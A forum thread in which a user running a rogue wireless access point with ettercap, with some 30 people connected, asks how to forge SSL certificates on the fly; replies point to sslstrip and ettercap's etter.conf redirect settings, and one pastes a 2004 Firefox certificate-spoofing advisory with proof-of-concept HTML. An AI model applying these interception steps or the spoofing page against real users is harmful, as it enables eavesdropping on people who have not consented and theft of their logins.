ettercap does this with a self-signed cert. "real" would mean you have access to a trusted cert for the same domain.. ?
SSL on the fly MITM
Anybody know of a program/plugin that can copy a real ssl cert and inject a fake copy on the fly? Using ettercap as MITM on a rouge AP. Yeah I know there will be a warning. Would be really cool to get this working with remote_browser.
All the best
onryo
Let me explain officer, I am not a hacker. I am a security tester of sorts!
ettercap does this with a self-signed cert. "real" would mean you have access to a trusted cert for the same domain.. ?
here you go
http://vimeo.com/3970303
Im not 100% sure but I believe that SSL strip may be able todo this.
What the rest said above is proable what your after.
This was a old SSL exploit, , want work but the theory might be good to look at..
Mozilla Firefox Certificate Spoofing
#########################################
Application: Mozilla Firefox
Vendors: http://www.mozilla.com
Version: 0.9.1 / 0.9.2
Platforms: Windows
Bug: Certificate Spoofing (Phishing)
Risk: High
Exploitation: Remote with browser
Date: 25 July 2004
Author: Emmanouel Kellinis
e-mail: me@cipher(dot)org(dot)uk
web: http://www.cipher.org.uk
List : BugTraq(SecurityFocus)/ Full-Disclosure
#########################################
=======
Product
=======
A popular Web browser,good alternative of IE and
"The web browser" for linux machines,
used to view pages on the World Wide Web.
===
Bug
===
Firefox has caching problem, as a result of that someone can
spoof a certificate of any website and use it as his/her own.
The problem is exploited using onunload inside < body> and
redirection using Http-equiv Refresh metatag,document.write()
and document.close()
First you direct the redirection metatag to the website
of which you want to spoof the certificate, then inside
the < body> tag you add onulnoad script so you can control
the output inside the webpage with the spoofed certificate.
After that you say to firefox, as soon as you unload this page
close the stream, aparently the stream you close is
the redirection website, you do that with
document.close().
Now you can write anything you want , you do that
using document.write(). After writing the content of you choice
you close the stream again , usually firefox wont display your content,
although if you check the source code you see it , so the last thing
is to refresh the new page (do that using window.location.reload()),
after that you have your domain name in the url field , your content
in the browser and the magic yellow Lock on the bottom left corner,
if you pass your mouse over it you will see displayed the name of
the website you spoofed the certificate, if you double click on it you
will check full information of the certificate without any warning !
You dont need to have SSL in your website ! it will work with
http.
Additional using this bug malicious websites can bypass content
filtering using SSL properties.
=====================
Proof Of Concept Code
=====================
< HTML>
< HEAD>
< TITLE>Spoofer< /TITLE>
< META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
< /HEAD>
< BODY
onunload="
document.close();
document.writeln('< body onload=document.close();break;>
< h3>It is Great to Use example's Cert!');
document.close();
window.location.reload();
">
< /body>
================================================== =======
*PK:http://www.cipher.org.uk/files/pgp/c...public.key.txt
================================================== =======
SSL cert on the fly
Thx guys, (never seen a chick hang out here)
I have had SSLstrip working in the past and even posted some mail that Moxie sent me here on the forms. In short SSLstrip is really cool but MUCH to slow. I have also made dumps that I later decrypted after giving the "vic" a fake cert.
The thing is that I have like 30+ ppl hanging on a karma like airbase rouge AP. Got -P -C working etc. Since ettercap is doing all the arp work I often hit the remote_browser plug in to see what is going on.
It would be really cool if there was a way to auto copy all the issuer info on the cert and send a self singed one. Yeah the "vic" will get the browser warning from hellIn short this is what I need.
1) auto copies info on real cert info, injects fake self singed one.
2) does this on the fly. No dumps
All the best
onryo
Let me explain officer, I am not a hacker. I am a security tester of sorts!
uhm ettercap does exactly that with its SSL dissector...Originally Posted by onryo
Thx guys, (never seen a chick hang out here)
I have had SSLstrip working in the past and even posted some mail that Moxie sent me here on the forms. In short SSLstrip is really cool but MUCH to slow. I have also made dumps that I later decrypted after giving the "vic" a fake cert.
The thing is that I have like 30+ ppl hanging on a karma like airbase rouge AP. Got -P -C working etc. Since ettercap is doing all the arp work I often hit the remote_browser plug in to see what is going on.
It would be really cool if there was a way to auto copy all the issuer info on the cert and send a self singed one. Yeah the "vic" will get the browser warning from hell
1) auto copies info on real cert info, injects fake self singed one.
2) does this on the fly. No dumps
All the best
onryo
EDIT: look into the etter.conf, check the redir command is set right
redir_command_on
You have to provide a valid command (or script) to enable tcp redirection at kernel level in order to be able to use SSL dissection. Your script should be able to get 3 parameters:
%iface
The network interface on which the rule must be set
%port
The source port of the packets to be redirected (443 for HTTPS, 993 for imaps, etc).
%rport
The internally bound port to which ettercap listens for connections.
NOTE: this script is executed with an execve(), so you can't use pipes or output redirection as if you were in a shell. We suggest you to make a script if you need those commands.
redir_command_off
This script is used to remove the redirect rules applied by 'redir_command_on'. You should note that this script is called atexit() and thus it has not high privileges. You should provide a setuid program or set ec_uid to 0 in order to be sure that the script is executed successfully.
Wummi are you sure that will copy the real cert? A few years back it just injected a premade cert and made a dump. The old way (if self installed) was something like uncommenting 2 lines after filling in the needed port info etc in the etter.conf? If this does copy the real cert I am going to shit egg rolls of joy!! Of course it will be self signed. I just assumed it worked like before. I am on a Winho machine for the next few hoursCan't wait to try this out.
BTW read your first posts. Love to see new ppl here have something contribute. Thx and welcome
All the best
onryo
Let me explain officer, I am not a hacker. I am a security tester of sorts!
Wummi are you sure that will copy the real cert? A few years back it just injected a premade cert and made a dump. The old way (if self installed) was something like uncommenting 2 lines after filling in the needed port info etc in the etter.conf? If this does copy the real cert I am going to shit egg rolls of joy!! Of course it will be self signed. I just assumed it worked like before. I am on a Winho machine for the next few hours
BTW read your first posts. Love to see new ppl here have something contribute. Thx and welcome
All the best
onryo
thx for the welcome! ettercap works how you need it.
here's the real cert in firefox 2 :
hxxp://666kb.com/i/b9bb3mu6e1w97nnrw.jpg
here's the one ettercap sends:
hxxp://666kb.com/i/b9bb3yitblc3cay3g.jpg
sorry it's german, but you should understand enough
PS: meh cant post urls for now...
EDIT: in bt4 you just need to uncomment the lines for iptables in etter.conf
Posting Permissions
